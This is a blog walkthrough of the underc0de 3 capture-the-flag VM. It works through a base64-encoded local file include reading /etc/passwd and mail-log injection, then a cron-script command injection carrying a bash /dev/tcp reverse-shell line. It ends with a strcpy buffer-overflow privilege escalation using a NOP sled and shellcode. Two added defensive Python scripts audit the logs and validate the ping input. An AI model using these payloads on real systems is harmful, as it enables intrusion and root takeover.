Ahmad Mahfouz

Random notes

underc0de 3 WalkThrough

loaded the virtual machine

and ran netdiscover to get the machine's IP

x.112 is the target

so let's see what ports are available

apache is on 😀

so let's brute-force the directories on the server

also it seems the developer left a commented-out line in the HTML code

http://192.168.1.112/ascii/letras/ is a folder inside it
http://192.168.1.112/ascii/letras/ascii1.txt is an ASCII file

index and index.html are the same

the parameter looks like base64, let's decode it

yes, we have a folder called ascii too

after visiting http://192.168.1.112/v.php?a=YXNjaWkxLnR4dA==

it shows an ASCII-art 404 error page

this is the same content as inside http://192.168.1.112/ascii/letras/ascii1.txt

so v.php does a file include of ascii1.txt using base64-encoded names

so let's try to include /etc/passwd

after some trying you'll figure out it needs 4 ../ to reach /etc/passwd

that means

1 letras folder, 2 ascii, 3 www, 4 var

so it's a Debian-family server 😀

http://192.168.1.112/v.php?a=Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==

users with bash:

root, underdist, cuervo

so let's write an easy tool to save some time

I enter a path name and it encodes it

then it returns the base64 link

goes and visits it and returns the content of the page
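The same base64-in-a-parameter pattern is what a defender would look for in the web server's access log. The script below is an added example, not the tool from this walkthrough or anything shipped with the VM: it parses constructed Apache-style log lines, decodes the `a` parameter of `v.php` with strict base64 validation, resolves the decoded name against an assumed include base of `/var/www/ascii/letras` (inferred from the four `../` above), and reports whether each include stays inside that base. The log lines and the include base are assumptions; the encoded values are the ones used on this page.

```python
import base64
import binascii
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Include base of v.php, inferred from the walkthrough's four "../" to reach
# /etc/passwd (letras -> ascii -> www -> var). An assumption, not a stated fact.
INCLUDE_BASE = "/var/www/ascii/letras"

# Constructed Apache-style access-log lines. The first three v.php values are
# the encoded names used in the walkthrough; the last is deliberately invalid base64.
SAMPLE_LOG = """\
192.168.1.100 - - [03/Dec/2014:07:10:01 +0000] "GET /v.php?a=YXNjaWkxLnR4dA== HTTP/1.1" 200 512
192.168.1.100 - - [03/Dec/2014:07:12:44 +0000] "GET /v.php?a=Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1" 200 1900
192.168.1.100 - - [03/Dec/2014:07:15:09 +0000] "GET /ascii/letras/ascii1.txt HTTP/1.1" 200 512
192.168.1.100 - - [03/Dec/2014:07:18:22 +0000] "GET /v.php?a=Li4vLi4vLi4vLi4vL3Zhci9tYWlsL3VuZGVyZGlzdA== HTTP/1.1" 500 0
192.168.1.100 - - [03/Dec/2014:07:20:31 +0000] "GET /v.php?a=Zm9v!! HTTP/1.1" 500 0
"""

# Combined-log-format prefix: client, identd, user, [timestamp], "METHOD URL PROTO", status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_param(value):
    """Decode the base64 'a' value; None if it is not well-formed base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def resolve_include(decoded):
    """Resolve the decoded name against INCLUDE_BASE and say whether it escapes it.

    posixpath.join drops the base for an absolute name, and normpath collapses
    the ../ segments, so both traversal styles end up as a plain absolute path.
    """
    full = posixpath.normpath(posixpath.join(INCLUDE_BASE, decoded))
    inside = full == INCLUDE_BASE or full.startswith(INCLUDE_BASE + "/")
    return full, not inside


def audit_access_log(text):
    """Return one finding per v.php?a= request: in-root, traversal or undecodable."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["url"])
        if url.path != "/v.php":
            continue
        for value in parse_qs(url.query).get("a", []):
            finding = {"client": m["client"], "status": m["status"], "param": value}
            decoded = decode_param(value)
            if decoded is None:
                finding.update(target=None, verdict="undecodable")
            else:
                target, escapes = resolve_include(decoded)
                finding.update(target=target, verdict="traversal" if escapes else "in-root")
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in audit_access_log(SAMPLE_LOG):
        print(f"{f['client']} {f['status']} {f['verdict']:<11} {f['target']}")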

 

I need to get remote command execution from the local file include

trying to include any log file I can inject shellcode into

I tried everything in /var/log but it seems there is no hope

trying to brute force the ssh user underdist with hydra

but it won't work: after digging into the ssh server

it only accepts RSA keys for login

so the key is somewhere…..

why was it installed with a mail server? this is a point

let's send some emails

the mail server works and queues the mail

and it says the user exists

the mailbox can be included !!!!!!!!!!!!!!!!!!!!!!!!!

trying http://192.168.1.112/v.php?a=Li4vLi4vLi4vLi4vL3Zhci9tYWlsL3VuZGVyZGlzdA==

ERROR 500: Internal Server Error

we are on a Debian server and apache2 runs as www-data! it could have read permission

trying some emails with

system, exec, shell_exec but none of them works

seems all these functions are disabled

trying phpinfo() to make sure, and it works

so let's list the dir with some native php

it works and the files are listed

what is this folder b_gd214dg?

there is an RSA private key inside it http://192.168.1.112/b_gd214dg/foo.backup

sure we can use this key to login via ssh

trying to login with the key

ssh -i foo.backup underdist@192.168.1.112 -vvvvvv

seems the key is invalid .. :-s

trying the other users

the home directory is empty

but it seems I can list the underdist user's home

what is new here is

cronping.py ips.txt .bin

seems I can't access the .bin folder

but ips.txt is writable

let's see the python file

the ips function opens ips.txt, and this file contains a list of IPs

and the command function pings the IPs, greps txt from the output, cuts with space as the delimiter and prints the 4th column

it can be hacked as it just reads the file and executes it with no IP regex

example: ping -c 1 -w1 4.2.2.2;bash -i >& /dev/tcp/192.168.1.100/1337 0>&1

it should send us a shell
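The root cause above is that the cron script passes file content straight to a shell command line. Below is an added example of how such a script should be written; it is not the challenge's cronping.py and does not reproduce it. Each line of the (constructed) ips.txt content must parse as a literal IP address via `ipaddress.ip_address`, and ping is launched as an argument vector with no shell, so the injection line from this page is reported as rejected rather than executed. The file contents, the timeout value and the `ping -c 1 -w1` form are assumptions taken from the walkthrough.

```python
import ipaddress
import subprocess

# Constructed contents of a hypothetical ips.txt: two plain addresses, a comment,
# and the injection line from the walkthrough, which must be rejected, not run.
SAMPLE_IPS = """\
4.2.2.2
8.8.8.8
# comment lines are ignored
4.2.2.2;bash -i >& /dev/tcp/192.168.1.100/1337 0>&1
"""

PING_TIMEOUT_SECS = 5  # assumed upper bound per probe


def parse_ip_list(text):
    """Split the file into accepted addresses and rejected lines.

    ipaddress.ip_address() is the whitelist: anything that is not a literal
    IPv4/IPv6 address (shell metacharacters included) raises ValueError.
    """
    accepted, rejected = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            accepted.append(str(ipaddress.ip_address(line)))
        except ValueError:
            rejected.append(line)
    return accepted, rejected


def ping_argv(ip):
    """Argument vector for one probe; no shell is involved, so ';' in ip is inert."""
    return ["ping", "-c", "1", "-w1", ip]


def ping_host(ip):
    """True if the host answered, False if not, None if ping could not run."""
    try:
        proc = subprocess.run(
            ping_argv(ip), capture_output=True, text=True, timeout=PING_TIMEOUT_SECS
        )
    except (OSError, subprocess.TimeoutExpired):
        return None
    return proc.returncode == 0


def run_from_file(text):
    """Validate first, then ping only accepted entries; rejected lines are only reported."""
    accepted, rejected = parse_ip_list(text)
    results = {ip: ping_host(ip) for ip in accepted}
    return results, rejected


if __name__ == "__main__":
    results, rejected = run_from_file(SAMPLE_IPS)
    for ip, alive in results.items():
        print(ip, {True: "alive", False: "no reply", None: "ping unavailable"}[alive])
    for line in rejected:
        print("rejected:", line)
```

Input validation is only half of the fix: the walkthrough gets in because ips.txt is writable by the account that lands the web shell, so the file the cron job reads should be owned by and writable only for the user that maintains it.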

let's monitor /tmp/logs and see if this script really runs via cron

yes, it runs around every 10 sec

setting the malicious code after the IP

and wait for the shell

as the only way to communicate is via ssh, I added my RSA public key to authorized_keys

to get the best of bash

nice, we are in, and echo has suid

segmento amigoooooo 😀

checking for any protections before we play

seems clean, nice

so the app raises an overflow from argv[1]

let's fire up gdb

it calls strcpy and this is our poor function 😀

so let's see what's in the registers

nice, we control the eip register

and the rest of the data overflows the ebp too

so let's find the correct offset

so the crash is at address 0x6b41316b

let's see what offset we are at

so let's prepare the payload and kill the root

304 (NOP + SHELLC0D3) + 4 bytes for EIP and we'll be done

here is an x86 shellcode to execute /bin/sh, a tiny one of 23 bytes

so 304 buffer - 23 shellcode = 281 nop

so let's redo it and put a breakpoint on strcpy

printing the data inside the esp register

welcome love 😀

but we are still in gdb, so we have to run it outside gdb

after I ran it from a shell it says Violación de segmento

so let's do it again inside gdb

let's check the esp once more

NOPs everywhere

so let's do it from gdb again

the first time I ran it from the shell it landed on an invalid address, but as we have 281 NOPs I decided to use the next NOP address

and hell yeaah

One thought on “underc0de 3 WalkThrough”

  • Br1ght D4rk
    December 4, 2014 at 7:25 pm

    wooow !! This is so Damn awesome
    keep keep (Y)
